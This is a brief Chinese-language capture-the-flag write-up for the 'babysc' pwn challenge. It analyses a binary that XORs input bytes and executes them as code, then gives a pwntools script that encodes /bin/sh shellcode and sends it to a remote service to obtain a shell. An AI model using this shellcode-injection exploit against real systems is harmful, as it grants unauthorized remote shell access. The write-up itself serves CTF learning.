CTF-PWN-babysc(Hgame)

直接运行该程序，发现没有任何提示信息，随便输入一串字符之后，程序错误退出。

扔进ida查看:

程序用read函数读入buf，然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量，buf长度为80

然后对于buf[i] ，异或buf[i]^(i+1)，最后将buf蕴含的指令赋值给rdx并执行。

我们可以考虑直接构造system(/bin/sh)，执行即可

from pwn import *
context(arch="amd64",os="linux")
payload2=""
payload=asm(shellcraft.sh())
payload+='\x00'*(80-len(payload))
for i in range(len(payload)):
    tmp=chr(ord(payload[i])^(i+1))
    payload2+=tmp
p=remote("××××××××",10000)
p.sendline(payload2)
p.interactive()